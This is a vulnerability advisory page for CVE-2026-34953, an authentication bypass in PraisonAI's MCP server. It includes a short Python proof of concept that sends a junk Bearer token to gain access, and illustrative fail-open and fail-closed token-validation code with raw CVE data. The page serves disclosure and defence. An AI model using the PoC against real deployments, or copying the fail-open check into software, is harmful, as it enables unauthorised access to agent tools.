Security Vulnerability Report
CVE-2026-34953 CVSS 9.1 CRITICAL

Published: 2026-04-03 23:17:07
Last Modified: 2026-04-09 16:52:58

Description

PraisonAI is a multi-agent teams system. Prior to version 4.5.97, OAuthManager.validate_token() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is therefore treated as authenticated, granting full access to all registered tools and agent capabilities. Because the store is empty out of the box, a freshly deployed MCP server reachable over the network is exploitable with no misconfiguration on the operator's part. This issue has been patched in version 4.5.97; operators should upgrade to 4.5.97 or later.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Exploitability Score: 3.9
Impact Score: 5.2
Weakness: CWE-863 (Incorrect Authorization)

The vector rates availability as not impacted (A:N) because the flaw is an authorization bypass rather than a denial of service; in practice the attacker can invoke every registered tool, so the real-world impact is bounded by what those tools can do.

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 4.5.97

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://localhost:8000/api/tools"

# Arbitrary Bearer token: the vulnerable validate_token() accepts any token
# that is absent from its (empty by default) store.
headers = {
    "Authorization": "Bearer arbitrary_invalid_token",
    "Content-Type": "application/json",
}

try:
    # Control request with no credentials at all. A correctly guarded endpoint
    # should answer 401/403 here; if it already returns 200, the endpoint is
    # simply unauthenticated and a 200 with the junk token proves nothing.
    baseline = requests.get(target_url, headers={"Content-Type": "application/json"})
    print("[*] No-token baseline status:", baseline.status_code)

    # Send request to vulnerable endpoint with the arbitrary token
    response = requests.get(target_url, headers=headers)
    if response.status_code == 200 and baseline.status_code in (401, 403):
        print("[+] Vulnerability confirmed! Authentication bypassed.")
        print("[+] Response:", response.text)
    elif response.status_code == 200:
        print("[?] 200 with and without a token; endpoint may be unauthenticated rather than bypassed.")
    else:
        print("[-] Unexpected response code:", response.status_code)
except Exception as e:
    print("[-] Error:", e)
```
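The root cause is a fail-open lookup: an unknown token falls through to `return True`, and since the store starts empty, every token is unknown. The following is an added illustration of that CWE-863 pattern next to a fail-closed replacement. It is not PraisonAI's code: the class names (chosen to echo the advisory's `OAuthManager.validate_token()`), the token-store layout, `issue_token`/`revoke_token`, and the `authorize_request()` helper are all assumptions made for this example.

```python
"""Fail-open vs fail-closed bearer-token validation (illustrative, not PraisonAI's code)."""
import hashlib
import secrets
from dataclasses import dataclass, field


def parse_bearer(authorization_header):
    """Return the token from an 'Authorization: Bearer <token>' value, or None."""
    if not authorization_header:
        return None
    scheme, _, token = authorization_header.strip().partition(" ")
    if scheme.lower() != "bearer" or not token.strip():
        return None
    return token.strip()


@dataclass
class FailOpenOAuthManager:
    """Reconstruction of the vulnerable behaviour (assumed shape): a token that is
    not in the store is treated as valid, and the store is empty by default."""
    tokens: dict = field(default_factory=dict)

    def validate_token(self, token):
        if token in self.tokens:
            return self.tokens[token]["active"]
        return True  # BUG: unknown token => accepted (fail-open)


@dataclass
class FailClosedOAuthManager:
    """Hardened variant: only tokens this manager issued and has not revoked
    validate. Tokens are stored as SHA-256 digests so a leaked store does not
    leak usable credentials."""
    _entries: dict = field(default_factory=dict)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue_token(self, subject, scopes=()):
        token = secrets.token_urlsafe(32)  # 256 bits of entropy
        self._entries[self._digest(token)] = {
            "sub": subject,
            "scopes": frozenset(scopes),
            "active": True,
        }
        return token

    def revoke_token(self, token):
        entry = self._entries.get(self._digest(token))
        if entry:
            entry["active"] = False

    def validate_token(self, token):
        if not token:
            return False
        entry = self._entries.get(self._digest(token))
        return bool(entry and entry["active"])  # unknown or revoked => denied


def authorize_request(manager, authorization_header):
    """Gate a tool call on the manager's decision. Returns (allowed, reason)."""
    token = parse_bearer(authorization_header)
    if token is None:
        return False, "missing or malformed Authorization header"
    if manager.validate_token(token):
        return True, "token accepted"
    return False, "token rejected"


def demo():
    """Exercise both managers with the PoC's junk token and with a real one."""
    results = {}
    junk = "Bearer arbitrary_invalid_token"  # constructed input, as in the PoC above
    results["fail_open_junk"] = authorize_request(FailOpenOAuthManager(), junk)[0]

    hardened = FailClosedOAuthManager()
    results["fail_closed_junk"] = authorize_request(hardened, junk)[0]
    results["fail_closed_missing"] = authorize_request(hardened, None)[0]
    real = hardened.issue_token("agent-operator", ["tools:read"])
    results["fail_closed_issued"] = authorize_request(hardened, f"Bearer {real}")[0]
    hardened.revoke_token(real)
    results["fail_closed_revoked"] = authorize_request(hardened, f"Bearer {real}")[0]
    return results


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {'ALLOWED' if allowed else 'denied'}")
```

The fail-closed version makes every path that is not an explicit match return False: missing header, unknown token, revoked token. That is the property to check when reviewing a fix for this class of bug, independent of whether the store is populated.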

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5 (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34953",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-03T23:17:06.653",
    "lastModified": "2026-04-09T16:52:58.253",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.97, OAuthManager.validate_token() returns True for any token not found in its internal store, which is empty by default. Any HTTP request to the MCP server with an arbitrary Bearer token is treated as authenticated, granting full access to all registered tools and agent capabilities. This issue has been patched in version 4.5.97."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.5.97",
                "matchCriteriaId": "7525B4ED-CECC-4805-8EED-C055561A15F0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-98f9-fqg5-hvq5",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```